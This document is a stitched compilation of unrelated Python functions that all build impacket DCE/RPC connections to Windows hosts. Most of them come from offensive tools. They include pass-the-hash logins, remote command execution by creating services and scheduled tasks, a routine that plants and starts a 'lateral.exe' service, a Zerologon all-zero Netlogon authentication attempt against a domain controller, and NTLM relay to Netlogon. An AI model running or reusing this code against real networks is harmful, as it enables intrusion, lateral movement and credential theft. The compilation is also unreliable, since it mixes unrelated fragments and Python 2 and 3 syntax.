def play(self, addr): stringbinding = r'ncacn_np:%s[\pipe\atsvc]' % addr rpctransport = transport.DCERPCTransportFactory(stringbinding) if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey) rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost) try: self.doStuff(rpctransport) except Exception as e: if logging.getLogger().level == logging.DEBUG: import traceback traceback.print_exc() logging.error(e) if str(e).find('STATUS_OBJECT_NAME_NOT_FOUND') >=0: logging.info('When STATUS_OBJECT_NAME_NOT_FOUND is received, try running again. It might work')
def run(self, addr): for protocol in self.__protocols: protodef = PSEXEC.KNOWN_PROTOCOLS[protocol] port = protodef[1] logging.info("Trying protocol %s...\n" % protocol) stringbinding = protodef[0] % addr rpctransport = transport.DCERPCTransportFactory(stringbinding) rpctransport.set_dport(port) #if hasattr(rpctransport,'preferred_dialect'): # rpctransport.preferred_dialect(SMB_DIALECT) if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey) rpctransport.set_kerberos(self.__doKerberos) self.doStuff(rpctransport)
def connect(self): rpctransport = transport.DCERPCTransportFactory(self.stringBinding) if len(self.hashes) > 0: lmhash, nthash = self.hashes.split(':') else: lmhash = '' nthash = '' if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. rpctransport.set_credentials(self.username, self.password, self.domain, lmhash, nthash) dce = rpctransport.get_dce_rpc() #dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_INTEGRITY) dce.connect() dce.bind(rprn.MSRPC_UUID_RPRN, transfer_syntax=self.ts) #resp = rrp.hOpenLocalMachine(dce, MAXIMUM_ALLOWED | rrp.KEY_WOW64_32KEY | rrp.KEY_ENUMERATE_SUB_KEYS) return dce, rpctransport #, resp['phKey']
def msrpc(): MSRPC_UUID_test = uuidtup_to_bin( ('00001111-2222-3333-4444-555566667777', '1.0')) USERNAME = '******' PASSWORD = '******' DOMAIN = "." target = argv[1] stringbinding = r'ncacn_np:%s[\pipe\lateral]' % target rpctransport = transport.DCERPCTransportFactory(stringbinding) rpctransport.set_dport(445) rpctransport.setRemoteHost(target) rpctransport.set_credentials(USERNAME, PASSWORD, DOMAIN, "", "", None) dce = rpctransport.get_dce_rpc() dce.connect() dce.bind(MSRPC_UUID_test) return dce
def connect2(self): rpctransport = transport.DCERPCTransportFactory(self.stringBinding) if len(self.hashes) > 0: lmhash, nthash = self.hashes.split(':') else: lmhash = '' nthash = '' if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. rpctransport.set_credentials(self.username, self.password, self.domain, lmhash, nthash) dce = rpctransport.get_dce_rpc() dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_INTEGRITY) #dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY) dce.connect() dce.bind(drsuapi.MSRPC_UUID_DRSUAPI, transfer_syntax=self.ts) return dce, rpctransport
def connect_and_bind(self): try: rpctransport = transport.DCERPCTransportFactory(self.do_binding()) if hasattr(rpctransport, 'set_credentials'): rpctransport.set_credentials(self.username, self.password, self.domain, '', '') dce = rpctransport.get_dce_rpc() dce.connect() self.rpcTransport = rpctransport if self.auth_level: dce.set_auth_level(self.auth_level) dce.bind(self.iface_uuid, transfer_syntax=self.ts) self.dce = dce except Exception as err: logger.debug( f'{type(self).__name__} - Connection failed for {self.destination}->{self.target}:{self.trgt_port} - {err}' )
def connect(self): rpctransport = transport.DCERPCTransportFactory(self.stringBinding) if len(self.machineUserHashes) > 0: lmhash, nthash = self.machineUserHashes.split(':') else: lmhash = '' nthash = '' if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. rpctransport.set_credentials(self.machineUser, '', self.domain, lmhash, nthash) dce = rpctransport.get_dce_rpc() # dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_INTEGRITY) dce.connect() dce.bind(nrpc.MSRPC_UUID_NRPC) resp = nrpc.hNetrServerReqChallenge(dce, NULL, self.serverName + '\x00', b'12345678') resp.dump() serverChallenge = resp['ServerChallenge'] if self.machineUserHashes == '': ntHash = None else: ntHash = unhexlify(self.machineUserHashes.split(':')[1]) self.sessionKey = nrpc.ComputeSessionKeyStrongKey('', b'12345678', serverChallenge, ntHash) ppp = nrpc.ComputeNetlogonCredential(b'12345678', self.sessionKey) try: resp = nrpc.hNetrServerAuthenticate3(dce, NULL, self.machineUser + '\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel, self.serverName + '\x00', ppp, 0x600FFFFF) resp.dump() except Exception as e: if str(e).find('STATUS_DOWNGRADE_DETECTED') < 0: raise self.clientStoredCredential = pack('<Q', unpack('<Q', ppp)[0] + 10) # dce.set_auth_type(RPC_C_AUTHN_NETLOGON) # dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_INTEGRITY) # dce2 = dce.alter_ctx(nrpc.MSRPC_UUID_NRPC) # dce2.set_session_key(self.sessionKey) return dce, rpctransport
def dump(self, remoteName, remoteHost): stringbinding = epm.hept_map(remoteHost, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp') logging.info('StringBinding %s' % stringbinding) rpctransport = transport.DCERPCTransportFactory(stringbinding) rpctransport.setRemoteHost(remoteHost) if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash) dce = rpctransport.get_dce_rpc() dce.connect() dce.bind(nrpc.MSRPC_UUID_NRPC) resp = nrpc.hNetrServerReqChallenge(dce, NULL, remoteName + '\x00', b'12345678') # resp.dump() serverChallenge = resp['ServerChallenge'] ntHash = unhexlify(self.__nthash) self.sessionKey = nrpc.ComputeSessionKeyStrongKey( self.__password, b'12345678', serverChallenge, ntHash) self.ppp = nrpc.ComputeNetlogonCredential(b'12345678', self.sessionKey) try: resp = nrpc.hNetrServerAuthenticate3( dce, NULL, self.__username + '\x00', nrpc. NETLOGON_SECURE_CHANNEL_TYPE.TrustedDnsDomainSecureChannel, remoteName + '\x00', self.ppp, 0x600FFFFF) # resp.dump() except Exception as e: if str(e).find('STATUS_DOWNGRADE_DETECTED') < 0: raise self.clientStoredCredential = pack('<Q', unpack('<Q', self.ppp)[0] + 10) return dce, rpctransport
def getSessionKey(computer, domain, domainIP, hashes, serverName, authMessage) : print ("Connecting to NETLOGON service : Authenticating Server") stringBinding = r'ncacn_np:%s[\PIPE\netlogon]' % domainIP rpctransport = transport.DCERPCTransportFactory(stringBinding) ntHash = unhexlify(hashes.split(':')[1]) rpctransport.set_credentials(computer,"",domain,"",ntHash) dce = rpctransport.get_dce_rpc() dce.connect() dce.bind(nrpc.MSRPC_UUID_NRPC) resp = nrpc.hNetrServerReqChallenge(dce, NULL, serverName +"\x00",'12345678') serverChallenge = resp['ServerChallenge'] sessionKey = nrpc.ComputeSessionKeyStrongKey('','12345678',serverChallenge, ntHash) ppp = nrpc.ComputeNetlogonCredential('12345678',sessionKey) nrpc.hNetrServerAuthenticate3(dce, NULL, computer+"\x00",nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel, serverName + '\x00', ppp, 0x600FFFFF) clientStoredCredential = pack('<Q', unpack('<Q',ppp)[0] + 10) #SamLogonWithFlags print "Forwarding NTLM Response to DC" request = nrpc.NetrLogonSamLogonWithFlags() request['LogonServer'] = '\x00' request['ComputerName'] = serverName + '\x00' request['ValidationLevel'] = nrpc.NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo4 request['LogonLevel'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation request['LogonInformation']['tag'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation request['LogonInformation']['LogonNetworkTransitive']['Identity']['LogonDomainName'] = authMessage['domain_name'].decode('utf-16le') request['LogonInformation']['LogonNetworkTransitive']['Identity']['ParameterControl'] = 0 request['LogonInformation']['LogonNetworkTransitive']['Identity']['UserName'] = authMessage['user_name'].decode('utf-16le') request['LogonInformation']['LogonNetworkTransitive']['Identity']['Workstation'] = '' request['LogonInformation']['LogonNetworkTransitive']['LmChallenge'] = 'AAAAAAAA' #challenge request['LogonInformation']['LogonNetworkTransitive']['NtChallengeResponse'] = authMessage['ntlm'] request['LogonInformation']['LogonNetworkTransitive']['LmChallengeResponse'] = authMessage['lanman'] authenticator = nrpc.NETLOGON_AUTHENTICATOR() authenticator['Credential'] = nrpc.ComputeNetlogonCredential(clientStoredCredential, sessionKey) authenticator['Timestamp'] = 10 request['Authenticator'] = authenticator request['ReturnAuthenticator']['Credential'] = '\x00'*8 request['ReturnAuthenticator']['Timestamp'] = 0 request['ExtraFlags'] = 0 resp = dce.request(request) encryptedSessionKey = authMessage['session_key'] sessionKey = generateEncryptedSessionKey(resp['ValidationInformation']['ValidationSam4']['UserSessionKey'], encryptedSessionKey) print "Retrieving Session Key from DC" return sessionKey
def connect_smb(): global dce try: smb_trans_conn = transport.DCERPCTransportFactory( 'ncacn_np:{}[\\pipe\\browser]'.format(rhost)) smb_trans_conn.connect() dce = smb_trans_conn.DCERPC_class(smb_trans_conn) dce.bind( uuid.uuidtup_to_bin( ('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0'))) except Exception as e: print(e) print(" [*] Failed to connect to SMB!") sys.exit(1) else: print( ' [*] Connected to ncacn_np:{}[\\pipe\\browser]'.format(rhost))
def run_samr(self): if self.__targetIp is not None: stringBinding = epm.hept_map(self.__targetIp, samr.MSRPC_UUID_SAMR, protocol = 'ncacn_np') else: stringBinding = epm.hept_map(self.__target, samr.MSRPC_UUID_SAMR, protocol = 'ncacn_np') rpctransport = transport.DCERPCTransportFactory(stringBinding) rpctransport.set_dport(self.__port) if self.__targetIp is not None: rpctransport.setRemoteHost(self.__targetIp) rpctransport.setRemoteName(self.__target) if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey) rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost) self.doSAMRAdd(rpctransport)
def __init__(self, target, share_name, username, password, domain, doKerberos=False, aesKey=None, kdcHost=None, hashes=None): self.__target = target self.__username = username self.__password = password self.__domain = domain self.__share_name = share_name self.__lmhash = '' self.__nthash = '' self.__outputBuffer = b'' self.__retOutput = False self.__aesKey = aesKey self.__doKerberos = doKerberos self.__kdcHost = kdcHost if hashes is not None: #This checks to see if we didn't provide the LM Hash if hashes.find(':') != -1: self.__lmhash, self.__nthash = hashes.split(':') else: self.__nthash = hashes if self.__password is None: self.__password = '' stringbinding = r'ncacn_np:%s[\pipe\atsvc]' % self.__target self.__rpctransport = transport.DCERPCTransportFactory(stringbinding) if hasattr(self.__rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. self.__rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey) self.__rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)
def check_pipe(target): username, password, domain, nthash = target.creds lmhash = "" if password else "aad3b435b51404eeaad3b435b51404ee" aesKey = None try: MSRPC_UUID_lateral = uuidtup_to_bin( ('00001111-2222-3333-4444-555566667777', '1.0')) stringbinding = r'ncacn_np:%s[\pipe\lateral]' % target.target_ip rpctransport = transport.DCERPCTransportFactory(stringbinding) rpctransport.set_dport(target.target_port) rpctransport.setRemoteHost(target.target_ip) rpctransport.set_credentials(username, password, domain, lmhash, nthash, aesKey) dce = rpctransport.get_dce_rpc() dce.connect() dce.bind(MSRPC_UUID_lateral) return True except: return False
def execute(self, command): self.__outputBuffer = '' stringbinding = r'ncacn_np:{}[\pipe\atsvc]'.format(self.host) self.__rpctransport = transport.DCERPCTransportFactory(stringbinding) if hasattr(self.__rpctransport, 'set_credentials'): self.__rpctransport.set_credentials(self.username, self.password, self.domain, self.lmhash, self.nthash) if self.fileless_output: self.tmpfile = "\\\\{}\\{}{}".format(self.ip, self.share, self.path + self.outfile) else: self.tmpfile = "%windir%\\Temp\\{}".format(self.outfile) self.doStuff(command) return self.__outputBuffer
def connect(self): rpctransport = transport.DCERPCTransportFactory(self.stringBinding) if len(self.hashes) > 0: lmhash, nthash = self.hashes.split(':') else: lmhash = '' nthash = '' if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. rpctransport.set_credentials(self.username, self.password, self.domain, lmhash, nthash) dce = rpctransport.get_dce_rpc() dce.connect() dce.bind(lsad.MSRPC_UUID_LSAD, transfer_syntax=self.ts) resp = lsad.hLsarOpenPolicy2( dce, MAXIMUM_ALLOWED | lsad.POLICY_CREATE_SECRET | DELETE | lsad.POLICY_VIEW_LOCAL_INFORMATION) return dce, rpctransport, resp['PolicyHandle']
def getMachineNameAndDomain(self): if self.__smbConnection.getServerName() == '': # No serverName.. this is either because we're doing Kerberos # or not receiving that data during the login process. # Let's try getting it through RPC rpc = transport.DCERPCTransportFactory( r'ncacn_np:445[\pipe\wkssvc]') rpc.set_smb_connection(self.__smbConnection) dce = rpc.get_dce_rpc() dce.connect() dce.bind(wkst.MSRPC_UUID_WKST) resp = wkst.hNetrWkstaGetInfo(dce, 100) dce.disconnect() return resp['WkstaInfo']['WkstaInfo100'][ 'wki100_computername'][:-1], resp['WkstaInfo']['WkstaInfo100'][ 'wki100_langroup'][:-1] else: return self.__smbConnection.getServerName( ), self.__smbConnection.getServerDomain()
def run(self, addr): result = '' for protocol in self.__protocols: protodef = CMDEXEC.KNOWN_PROTOCOLS[protocol] port = protodef[1] stringbinding = protodef[0] % addr rpctransport = transport.DCERPCTransportFactory(stringbinding) rpctransport.set_dport(port) if hasattr(rpctransport, 'preferred_dialect'): rpctransport.preferred_dialect(SMB_DIALECT) if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash) try: self.shell = RemoteShell(self.__share, rpctransport, self.__mode, self.__serviceName, self.__command) result = self.shell.send_data(self.__command, self.__disp_output) except SessionError as e: if 'STATUS_SHARING_VIOLATION' in str(e): return if self.__mode != 'SERVER': smb_server = SMBServer() smb_server.daemon = True smb_server.start() self.__mode = 'SERVER' self.shell = RemoteShell(self.__share, rpctransport, self.__mode, self.__serviceName, self.__command) self.shell.set_copyback() result = self.shell.send_data(self.__command, self.__disp_output) smb_server.stop() return result
def _create_rpc_connection(self, pipe): # Here we build the DCE/RPC connection self._pipe = pipe binding_strings = dict() binding_strings['srvsvc'] = srvs.MSRPC_UUID_SRVS binding_strings['wkssvc'] = wkst.MSRPC_UUID_WKST binding_strings['samr'] = samr.MSRPC_UUID_SAMR binding_strings['svcctl'] = scmr.MSRPC_UUID_SCMR binding_strings['drsuapi'] = drsuapi.MSRPC_UUID_DRSUAPI # TODO: try to fallback to TCP/139 if tcp/445 is closed if self._pipe == r'\drsuapi': string_binding = epm.hept_map(self._target_computer, drsuapi.MSRPC_UUID_DRSUAPI, protocol='ncacn_ip_tcp') rpctransport = transport.DCERPCTransportFactory(string_binding) rpctransport.set_credentials(username=self._user, password=self._password, domain=self._domain, lmhash=self._lmhash, nthash=self._nthash) else: rpctransport = transport.SMBTransport(self._target_computer, 445, self._pipe, username=self._user, password=self._password, domain=self._domain, lmhash=self._lmhash, nthash=self._nthash) rpctransport.set_connect_timeout(10) dce = rpctransport.get_dce_rpc() if self._pipe == r'\drsuapi': dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY) dce.connect() dce.bind(binding_strings[self._pipe[1:]]) self._rpc_connection = dce
def dce_rpc_connect(self, binding, uuid): logging.debug('DCE/RPC binding: %s' % binding) try: self.rpc = transport.DCERPCTransportFactory(binding) self.rpc.set_connect_timeout(1.0) if hasattr(self.rpc, 'set_credentials'): self.rpc.set_credentials(self.ad.auth.username, self.ad.auth.password, domain=self.ad.auth.domain, lmhash=self.ad.auth.lm_hash, nthash=self.ad.auth.nt_hash, aesKey=self.ad.auth.aes_key) # TODO: check Kerberos support # if hasattr(self.rpc, 'set_kerberos'): # self.rpc.set_kerberos(True, self.ad.auth.kdc) # Yes we prefer SMB3, but it isn't supported by all OS # self.rpc.preferred_dialect(smb3structs.SMB2_DIALECT_30) # Implement connections reuse? # rpc.setup_smb_connection() dce = self.rpc.get_dce_rpc() # Implement connection timeout? dce.connect() # Implement encryption? # dce.set_auth_level(NTLM_AUTH_PKT_PRIVACY) dce.bind(uuid) except DCERPCException as e: logging.debug(traceback.format_exc()) logging.warning('DCE/RPC connection failed: %s' % str(e)) return None except KeyboardInterrupt: raise except Exception as e: logging.debug(traceback.format_exc()) logging.warning('DCE/RPC connection failed: %s' % e) return None except: logging.warning('DCE/RPC connection failed (unknown error)') return None return dce
def start_service(target): username, password, domain, nthash = target.creds lmhash = "" if password else "aad3b435b51404eeaad3b435b51404ee" aesKey = None remoteName = target.target_ip remoteHost = target.target_ip stringbinding = r'ncacn_np:%s[\pipe\svcctl]' % remoteName rpctransport = transport.DCERPCTransportFactory(stringbinding) rpctransport.set_dport(target.target_port) rpctransport.setRemoteHost(remoteHost) if hasattr(rpctransport, 'set_credentials'): rpctransport.set_credentials(username, password, domain, lmhash, nthash, aesKey) rpctransport.set_kerberos(False, None) dce = rpctransport.get_dce_rpc() dce.connect() dce.bind(scmr.MSRPC_UUID_SCMR) rpc = dce #print("[*] creating") ans = scmr.hROpenSCManagerW(rpc) scManagerHandle = ans['lpScHandle'] try: scmr.hRCreateServiceW(rpc, scManagerHandle, "lateral" + '\x00', "Lateral" + '\x00', lpBinaryPathName='lateral.exe\x00') except Exception as e: print(str(e)) #print("[*] starting") ans = scmr.hROpenServiceW(rpc, scManagerHandle, "lateral" + '\x00') serviceHandle = ans['lpServiceHandle'] try: scmr.hRStartServiceW(rpc, serviceHandle) except: pass scmr.hRCloseServiceHandle(rpc, serviceHandle)
def exec(self, command): if not super().exec(command): return False try: stringbinding = r'ncacn_np:%s[\pipe\svcctl]' % self.session.address logging.debug('StringBinding %s' % stringbinding) self._rpctransport = transport.DCERPCTransportFactory(stringbinding) self._rpctransport.set_dport(445) self._rpctransport.setRemoteHost(self.session.address) if hasattr(self._rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. self._rpctransport.set_credentials(self.session.username, self.session.password, self.session.domain, self.session.lmhash, self.session.nthash, self.session.aesKey) self._rpctransport.set_kerberos(self.session.kerberos, self.session.dc_ip) self._scmr = self._rpctransport.get_dce_rpc() try: self._scmr.connect() except Exception as e: raise Exception("An error occurred while connecting to SVCCTL: %s" % e) s = self._rpctransport.get_smb_connection() s.setTimeout(100000) self._scmr.bind(scmr.MSRPC_UUID_SCMR) resp = scmr.hROpenSCManagerW(self._scmr) _scHandle = resp['lpScHandle'] resp = scmr.hRCreateServiceW(self._scmr, _scHandle, self._serviceName, self._serviceName, lpBinaryPathName=command, dwStartType=scmr.SERVICE_DEMAND_START) logging.debug("Service %s created" % self._serviceName) self._service = resp['lpServiceHandle'] try: scmr.hRStartServiceW(self._scmr, self._service) logging.debug("Service %s restarted for command execution" % self._serviceName) except: pass self.clean() except KeyboardInterrupt as e: logging.debug("Keyboard interrupt: Trying to delete %s if it exists" % self._serviceName) self.clean() raise KeyboardInterrupt(e) except Exception as e: self.clean() raise Exception(e) return True
def connect(self, string_binding=None, iface_uuid=None): """Obtains a RPC Transport and a DCE interface according to the bindings and transfer syntax specified. :return: tuple of DCE/RPC and RPC Transport objects :rtype: (DCERPC_v5, DCERPCTransport) """ string_binding = string_binding or self.string_binding if not string_binding: raise NotImplemented("String binding must be defined") rpc_transport = transport.DCERPCTransportFactory(string_binding) # Set timeout if defined if self.timeout: rpc_transport.set_connect_timeout(self.timeout) # Authenticate if specified if self.authn and hasattr(rpc_transport, 'set_credentials'): # This method exists only for selected protocol sequences. rpc_transport.set_credentials(self.username, self.password, self.domain, self.lmhash, self.nthash) # Gets the DCE RPC object dce = rpc_transport.get_dce_rpc() # Set the authentication level if self.authn_level: dce.set_auth_level(self.authn_level) # Connect dce.connect() # Bind if specified iface_uuid = iface_uuid or self.iface_uuid if iface_uuid and self.transfer_syntax: dce.bind(iface_uuid, transfer_syntax=self.transfer_syntax) elif iface_uuid: dce.bind(iface_uuid) return dce, rpc_transport
def IOXIDResolver(target_ip): authLevel = RPC_C_AUTHN_LEVEL_NONE stringBinding = r'ncacn_ip_tcp:%s' % target_ip rpctransport = transport.DCERPCTransportFactory(stringBinding) portmap = rpctransport.get_dce_rpc() portmap.set_auth_level(authLevel) portmap.connect() objExporter = IObjectExporter(portmap) bindings = objExporter.ServerAlive2() print("[*] Retrieving network interface of " + target_ip) #NetworkAddr = bindings[0]['aNetworkAddr'] for binding in bindings: NetworkAddr = binding['aNetworkAddr'] print("Address: " + NetworkAddr) print("")
def __set_rpc_connection(self, remote_name, remote_host): """ Create an rpc session :param remote_name: :param remote_host: :return: """ string_binding = r'ncacn_np:%s[\pipe\samr]' % remote_name logging.debug('StringBinding %s' % string_binding) rpc_transport = transport.DCERPCTransportFactory(string_binding) rpc_transport.set_dport(self.__port) rpc_transport.setRemoteHost(remote_host) if hasattr(rpc_transport, 'set_credentials'): # This method exists only for selected protocol sequences. rpc_transport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aes_key) rpc_transport.set_kerberos(self.__do_kerberos, self.__kdc_host) return rpc_transport
def initConnection(self): rpctransport = transport.DCERPCTransportFactory(self.stringbinding) if self.serverConfig.rpc_use_smb: LOG.info( "Authenticating to smb://%s:%d with creds provided in cmdline" % (self.target.netloc, self.serverConfig.rpc_smb_port)) rpctransport.set_credentials(self.serverConfig.smbuser, self.serverConfig.smbpass, self.serverConfig.smbdomain, \ self.serverConfig.smblmhash, self.serverConfig.smbnthash) rpctransport.set_dport(self.serverConfig.rpc_smb_port) self.session = MYDCERPC_v5(rpctransport) self.session.set_auth_level(RPC_C_AUTHN_LEVEL_CONNECT) self.session.connect() if self.serverConfig.rpc_use_smb: LOG.info("Authentication to smb://%s:%d succeeded" % (self.target.netloc, self.serverConfig.rpc_smb_port)) return True
def connect(self, host, service): if service == 'wkssvc': stringBinding = r'ncacn_np:{}[\PIPE\wkssvc]'.format(host) elif service == 'srvsvc': stringBinding = r'ncacn_np:{}[\PIPE\srvsvc]'.format(host) rpctransport = transport.DCERPCTransportFactory(stringBinding) rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash) dce = rpctransport.get_dce_rpc() dce.connect() if service == 'wkssvc': dce.bind(wkst.MSRPC_UUID_WKST, transfer_syntax = self.__ts) elif service == 'srvsvc': dce.bind(srvs.MSRPC_UUID_SRVS, transfer_syntax = self.__ts) self.__local_ip = rpctransport.get_smb_server().get_socket().getsockname()[0] return dce, rpctransport
def try_zero_authenticate( dc_handle, dc_ip, target_computer, channel=nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel): # Connect to the DC's Netlogon service. binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp') rpc_con = transport.DCERPCTransportFactory(binding).get_dce_rpc() rpc_con.connect() rpc_con.bind(nrpc.MSRPC_UUID_NRPC) # Use an all-zero challenge and credential. plaintext = b'\x00' * 8 ciphertext = b'\x00' * 8 # Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled. flags = 0x212fffff # Send challenge and authentication request. nrpc.hNetrServerReqChallenge(rpc_con, dc_handle + '\x00', target_computer + '\x00', plaintext) try: server_auth = nrpc.hNetrServerAuthenticate3( rpc_con, dc_handle + '\x00', target_computer + '$\x00', channel, target_computer + '\x00', ciphertext, flags) # It worked! assert server_auth['ErrorCode'] == 0 return rpc_con except nrpc.DCERPCSessionError as ex: # Failure should be due to a STATUS_ACCESS_DENIED error. Otherwise, the attack is probably not working. if ex.get_error_code() == 0xc0000022: return None else: fail("Unexpected error code from DC: {}.".format( ex.get_error_code())) except BaseException as ex: fail("Unexpected error: {}.".format(ex))
def run(self, addr): for protocol in self.__protocols: protodef = CMDEXEC.KNOWN_PROTOCOLS[protocol] port = protodef[1] logging.info("Trying protocol %s..." % protocol) logging.info("Creating service %s..." % self.__serviceName) stringbinding = protodef[0] % addr rpctransport = transport.DCERPCTransportFactory(stringbinding) rpctransport.set_dport(port) if hasattr(rpctransport, 'preferred_dialect'): rpctransport.preferred_dialect(SMB_DIALECT) if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey) rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost) self.shell = None try: if self.__mode == 'SERVER': serverThread = SMBServer() serverThread.daemon = True serverThread.start() self.shell = RemoteShell(self.__share, rpctransport, self.__mode, self.__serviceName) self.shell.cmdloop() if self.__mode == 'SERVER': serverThread.stop() except (Exception, KeyboardInterrupt), e: #import traceback #traceback.print_exc() logging.critical(str(e)) if self.shell is not None: self.shell.finish() sys.stdout.flush() sys.exit(1)
def connect(self): if self.rrpStarted is not True: dce, rpctransport, scHandle = self.connect_scmr() desiredAccess = scmr.SERVICE_START | scmr.SERVICE_STOP | scmr.SERVICE_CHANGE_CONFIG | \ scmr.SERVICE_QUERY_CONFIG | scmr.SERVICE_QUERY_STATUS | scmr.SERVICE_ENUMERATE_DEPENDENTS resp = scmr.hROpenServiceW(dce, scHandle, 'RemoteRegistry\x00', desiredAccess) resp.dump() serviceHandle = resp['lpServiceHandle'] try: resp = scmr.hRStartServiceW(dce, serviceHandle) except Exception as e: if str(e).find('ERROR_SERVICE_ALREADY_RUNNING') >= 0: pass else: raise resp = scmr.hRCloseServiceHandle(dce, scHandle) self.rrpStarted = True rpctransport = transport.DCERPCTransportFactory(self.stringBinding) if len(self.hashes) > 0: lmhash, nthash = self.hashes.split(':') else: lmhash = '' nthash = '' if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. rpctransport.set_credentials(self.username, self.password, self.domain, lmhash, nthash) dce = rpctransport.get_dce_rpc() #dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_INTEGRITY) dce.connect() dce.bind(rrp.MSRPC_UUID_RRP, transfer_syntax=self.ts) resp = rrp.hOpenLocalMachine( dce, MAXIMUM_ALLOWED | rrp.KEY_WOW64_32KEY | rrp.KEY_ENUMERATE_SUB_KEYS) return dce, rpctransport, resp['phKey']
def run(self, addr): result = '' for protocol in self.__protocols: protodef = CMDEXEC.KNOWN_PROTOCOLS[protocol] port = protodef[1] #logging.info("Trying protocol %s..." % protocol) #logging.info("Creating service %s..." % self.__serviceName) stringbinding = protodef[0] % addr rpctransport = transport.DCERPCTransportFactory(stringbinding) rpctransport.set_dport(port) if hasattr(rpctransport,'preferred_dialect'): rpctransport.preferred_dialect(SMB_DIALECT) if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey) try: self.shell = RemoteShellsmbexec(self.__share, rpctransport, self.__mode, self.__serviceName, self.__command) result = self.shell.send_data(self.__command) except SessionError as e: if 'STATUS_SHARING_VIOLATION' in str(e): return else: print "[-] {}".format(e) #self.__mode = 'SERVER' #serverThread = SMBServer() #serverThread.daemon = True #serverThread.start() #self.shell = RemoteShellsmbexec(self.__share, rpctransport, self.__mode, self.__serviceName, self.__command) #self.shell.set_copyback() #result = self.shell.send_data(self.__command) #serverThread.stop() except (Exception, KeyboardInterrupt), e: print e traceback.print_exc() self.shell.finish() sys.stdout.flush()